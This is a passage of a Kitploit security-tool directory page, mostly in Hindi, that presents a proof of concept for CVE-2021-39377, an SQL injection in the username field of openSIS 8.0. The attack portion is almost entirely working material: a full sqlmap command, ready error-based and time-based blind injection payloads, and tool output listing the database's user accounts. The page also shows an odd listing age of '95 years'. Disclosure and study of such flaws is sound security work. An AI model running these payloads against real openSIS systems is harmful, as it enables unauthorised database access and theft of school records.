Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-39377 — CVE-2021-39377 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, openSIS 8.0 में username पैरामीटर के माध्यम से एक SQL इंजेक्शन भेद्यता, जो एरर-आधारित और टाइम-आधारित ब्लाइंड हमलों के जरिए डेटाबेस पर कब्ज़ा करने में सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/security-n/cve-2021-39377
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubsecurity-n/cve-2021-39377

CVE-2021-39377

CVE-2021-39377 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, openSIS 8.0 में username पैरामीटर के माध्यम से एक SQL इंजेक्शन भेद्यता, जो एरर-आधारित और टाइम-आधारित ब्लाइंड हमलों के जरिए डेटाबेस पर कब्ज़ा करने में सक्षम बनाती है।

रिपॉजिटरी देखें
95 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

OPENSIS 8.0 SQL इंजेक्शन भेद्यता CVE-2021-39377

openSIS के संस्करण 8.0 में SQL इंजेक्शन भेद्यता मौजूद है, जब MySQL (MariaDB) का उपयोग एप्लिकेशन डेटाबेस के रूप में किया जा रहा हो। एक दुर्भावनापूर्ण हमलावर कमजोर username= पैरामीटर के माध्यम से MySQL (MariaDB) डेटाबेस को SQL कमांड जारी कर सकता है।

कमजोर PHP पेज:

index.php - username पैरामीटर

कमजोर पेलोड

sqlmap "http://localhost:8081/index.php" --users --data="USERNAME=admin&PASSWORD=test1234%21&language=en&log=" --dbms="MySQL" --level=3 --risk=2

SQL इंजेक्शन:

http://localhost:8081/index.php

Parameter: USERNAME (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: USERNAME=admin') AND (SELECT 4391 FROM(SELECT COUNT(*),CONCAT(0x71716b7071,(SELECT (ELT(4391=4391,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IzoO&PASSWORD=test1234!&language=en&log=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: USERNAME=admin') AND (SELECT 2137 FROM (SELECT(SLEEP(5)))BwzJ)-- sbsL&PASSWORD=test1234!&language=en&log=

[22:35:47] [INFO] testing MySQL
[22:35:47] [INFO] confirming MySQL
[22:35:47] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.4.21
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[22:35:47] [INFO] fetching database users
database management system users [3]:
[*] 'mariadb.sys'@'localhost'
[*] 'mysql'@'localhost'
[*] 'root'@'localhost'

Nathan Johnson द्वारा खोजा गया, अगस्त 2021

टूल डाउनलोड करें